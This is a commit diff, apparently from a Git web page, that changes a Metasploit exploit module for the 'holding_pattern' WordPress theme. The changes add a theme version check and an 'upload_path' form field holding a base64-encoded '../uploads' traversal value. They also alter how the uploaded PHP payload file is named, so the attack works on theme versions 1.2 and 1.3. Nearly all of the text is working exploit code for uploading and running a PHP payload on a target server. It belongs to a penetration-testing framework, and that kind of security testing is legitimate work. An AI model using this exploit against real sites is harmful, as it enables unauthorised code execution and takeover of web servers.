Fix problem causing upload to fail on versions 1.2 and 1.3 of theme
parent
a030179577
commit
5660c1238b
|
@ -43,6 +43,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
))
|
||||
end
|
||||
|
||||
def check
|
||||
check_theme_version_from_readme('holding_pattern')
|
||||
end
|
||||
|
||||
def rhost
|
||||
datastore['RHOST']
|
||||
end
|
||||
|
@ -60,12 +64,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
target_ip = IPSocket.getaddress(rhost)
|
||||
field_name = Rex::Text.md5(target_ip)
|
||||
data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{field_name}\"; filename=\"#{payload_name}\"")
|
||||
data.add_part('Li4vdXBsb2Fkcw==', nil, nil, 'form-data; name="upload_path"')
|
||||
data
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("#{peer} - Preparing payload...")
|
||||
payload_name = "#{Rex::Text.rand_text_alpha(10)}.php"
|
||||
payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.php"
|
||||
data = generate_mime_message(payload, payload_name)
|
||||
|
||||
print_status("#{peer} - Uploading payload...")
|
||||
|
|
Loading…
Reference in New Issue